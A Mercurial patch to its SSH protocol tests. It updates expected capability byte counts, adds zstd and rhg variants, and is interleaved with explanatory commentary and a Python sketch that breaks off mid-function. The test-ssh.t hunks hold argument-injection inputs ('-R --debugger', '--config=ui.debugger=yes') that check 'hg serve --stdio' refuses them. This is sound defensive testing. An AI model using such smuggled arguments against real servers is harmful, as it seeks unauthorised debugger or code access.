+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending unbundle command
--- a/tests/test-ssh-proto.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-ssh-proto.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,12 @@
#require no-chg
+persistent-nodemap is not enabled by default. It is not relevant for this test, so disable it.
+
+ $ cat << EOF >> $HGRCPATH
+ > [format]
+ > use-persistent-nodemap = no
+ > EOF
+
$ cat > hgrc-sshv2 << EOF
> %include $HGRCPATH
> [experimental]
@@ -64,7 +71,7 @@
devel-peer-request: pairs: 81 bytes
sending hello command
sending between command
- remote: 463
+ remote: 444
remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
remote: 1
devel-peer-request: protocaps
@@ -86,8 +93,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
`hg debugserve --sshstdio` works
@@ -96,7 +103,7 @@
$ hg debugserve --sshstdio << EOF
> hello
> EOF
- 463
+ 444
capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
I/O logging works
@@ -106,24 +113,24 @@
> EOF
e> flush() -> None
o> write(4) -> 4:
- o> 463\n
- o> write(463) -> 463:
+ o> 444\n
+ o> write(444) -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
- 463
+ 444
capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> flush() -> None
$ hg debugserve --sshstdio --logiofile $TESTTMP/io << EOF
> hello
> EOF
- 463
+ 444
capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
$ cat $TESTTMP/io
e> flush() -> None
o> write(4) -> 4:
- o> 463\n
- o> write(463) -> 463:
+ o> 444\n
+ o> write(444) -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> flush() -> None
@@ -149,8 +156,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -187,7 +194,7 @@
remote: banner: line 7
remote: banner: line 8
remote: banner: line 9
- remote: 463
+ remote: 444
remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
remote: 1
devel-peer-request: protocaps
@@ -245,8 +252,8 @@
o> readline() -> 15:
o> banner: line 9\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -297,12 +304,12 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
+ o> 444\n
i> write(98) -> 98:
i> between\n
i> pairs 81\n
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
- o> readline() -> 463:
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -316,7 +323,7 @@
sending hello command
sending between command
remote: 0
- remote: 463
+ remote: 444
remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
remote: 1
devel-peer-request: protocaps
@@ -365,8 +372,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -390,7 +397,7 @@
remote: 0
remote: 0
remote: 0
- remote: 463
+ remote: 444
remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
remote: 1
devel-peer-request: protocaps
@@ -447,8 +454,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -494,8 +501,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -539,8 +546,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -609,8 +616,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
Incomplete dictionary send
@@ -691,8 +698,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -725,8 +732,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -768,8 +775,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -797,8 +804,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(105) -> 105:
i> between\n
@@ -838,8 +845,8 @@
i> pairs 81\n
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -887,8 +894,8 @@
o> readline() -> 41:
o> 68986213bd4485ea51533535e3fc9e78007a711f\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -914,7 +921,7 @@
o> readline() -> 41:
o> 68986213bd4485ea51533535e3fc9e78007a711f\n
o> readline() -> 4:
- o> 463\n
+ o> 444\n
Send an upgrade request to a server that doesn't support that command
@@ -943,8 +950,8 @@
i> pairs 81\n
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -962,7 +969,7 @@
sending hello command
sending between command
remote: 0
- remote: 463
+ remote: 444
remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
remote: 1
devel-peer-request: protocaps
@@ -1005,8 +1012,8 @@
o> readline() -> 44:
o> upgraded this-is-some-token exp-ssh-v2-0003\n
o> readline() -> 4:
- o> 462\n
- o> readline() -> 463:
+ o> 443\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
$ cd ..
@@ -1081,7 +1088,6 @@
remote-changegroup
http
https
- rev-branch-cache
stream
v2
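
The capability banner shrinks by 19 bytes throughout this file (463 -> 444,
462 -> 443, 447 -> 428), which lines up with dropping the rev-branch-cache
token removed in the hunk above, assuming the token travels with one
percent-encoded newline separator inside the bundle2 capability string:

  removed = "rev-branch-cache%0A"  # '%0A' is the encoded separator
  assert len(removed) == 19
  for old in (463, 462, 447):
      print(old, "->", old - len(removed))
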
@@ -1114,14 +1120,14 @@
o> readline() -> 44:
o> upgraded this-is-some-token exp-ssh-v2-0003\n
o> readline() -> 4:
- o> 462\n
- o> readline() -> 463:
+ o> 443\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 447\n
- o> readline() -> 447:
+ o> 428\n
+ o> readline() -> 428:
o> capabilities: branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
Multiple upgrades is not allowed
@@ -1152,8 +1158,8 @@
o> readline() -> 44:
o> upgraded this-is-some-token exp-ssh-v2-0003\n
o> readline() -> 4:
- o> 462\n
- o> readline() -> 463:
+ o> 443\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(45) -> 45:
i> upgrade another-token proto=irrelevant\n
@@ -1224,8 +1230,8 @@
i> write(6) -> 6:
i> hello\n
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
i> write(98) -> 98:
i> between\n
@@ -1343,8 +1349,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1381,8 +1387,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending listkeys command
@@ -1431,8 +1437,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1461,8 +1467,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending listkeys command
@@ -1492,8 +1498,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1525,8 +1531,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending listkeys command
@@ -1559,8 +1565,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1595,8 +1601,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending listkeys command
@@ -1634,8 +1640,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1674,8 +1680,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending pushkey command
@@ -1726,8 +1732,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1759,8 +1765,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending listkeys command
@@ -1809,8 +1815,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1847,8 +1853,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending listkeys command
@@ -1886,8 +1892,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1922,8 +1928,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending listkeys command
@@ -1959,8 +1965,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -1992,8 +1998,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending listkeys command
@@ -2030,8 +2036,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -2071,8 +2077,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending pushkey command
@@ -2137,8 +2143,8 @@
i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000
i> flush() -> None
o> readline() -> 4:
- o> 463\n
- o> readline() -> 463:
+ o> 444\n
+ o> readline() -> 444:
o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n
o> readline() -> 2:
o> 1\n
@@ -2177,8 +2183,8 @@
o> readline() -> 62:
o> upgraded * exp-ssh-v2-0003\n (glob)
o> readline() -> 4:
- o> 462\n
- o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ o> 443\n
+ o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
o> read(1) -> 1:
o> \n
sending batch with 3 sub-commands
--- a/tests/test-ssh.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-ssh.t Tue Apr 20 11:01:06 2021 -0400
@@ -64,8 +64,10 @@
$ hg clone -e "\"$PYTHON\" \"$TESTDIR/dummyssh\"" --stream ssh://user@dummy/remote local-stream
streaming all changes
- 8 files to transfer, 827 bytes of data
- transferred 827 bytes in * seconds (*) (glob)
+ 8 files to transfer, 827 bytes of data (no-zstd !)
+ transferred 827 bytes in * seconds (*) (glob) (no-zstd !)
+ 8 files to transfer, 846 bytes of data (zstd !)
+ transferred * bytes in * seconds (* */sec) (glob) (zstd !)
updating to branch default
2 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ cd local-stream
@@ -390,6 +392,7 @@
abort: destination 'a repo' is not empty
[10]
+#if no-rhg
Make sure hg is really paranoid in serve --stdio mode. It used to be
possible to get a debugger REPL by specifying a repo named --debugger.
$ hg -R --debugger serve --stdio
@@ -402,6 +405,27 @@
$ hg -R narf serv --stdio
abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio']
[255]
+#else
+rhg aborts early on -R without a repository at that path
+ $ hg -R --debugger serve --stdio
+ abort: potentially unsafe serve --stdio invocation: ['-R', '--debugger', 'serve', '--stdio'] (missing-correct-output !)
+ abort: repository --debugger not found (known-bad-output !)
+ [255]
+ $ hg -R --config=ui.debugger=yes serve --stdio
+ abort: potentially unsafe serve --stdio invocation: ['-R', '--config=ui.debugger=yes', 'serve', '--stdio'] (missing-correct-output !)
+ abort: repository --config=ui.debugger=yes not found (known-bad-output !)
+ [255]
+ $ hg -R narf serv --stdio
+ abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio'] (missing-correct-output !)
+ abort: repository narf not found (known-bad-output !)
+ [255]
+If the repo does exist, rhg finds an unsupported command and falls back to
+Python, which still does the right thing.
+ $ hg init narf
+ $ hg -R narf serv --stdio
+ abort: potentially unsafe serve --stdio invocation: ['-R', 'narf', 'serv', '--stdio']
+ [255]
+#endif
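
A hedged sketch of the dispatch order the #else branch exercises (this is
not rhg's actual code; the names and command subset are illustrative): rhg
validates the -R path before anything else, so a bogus repository aborts
early, while an unsupported command on a real repository falls through to
the Python hg and its full safety checks.

  import os

  SUPPORTED_COMMANDS = {"cat", "files", "root"}  # illustrative subset

  def rhg_dispatch(argv, run_python_hg):
      args = list(argv)
      if "-R" in args:
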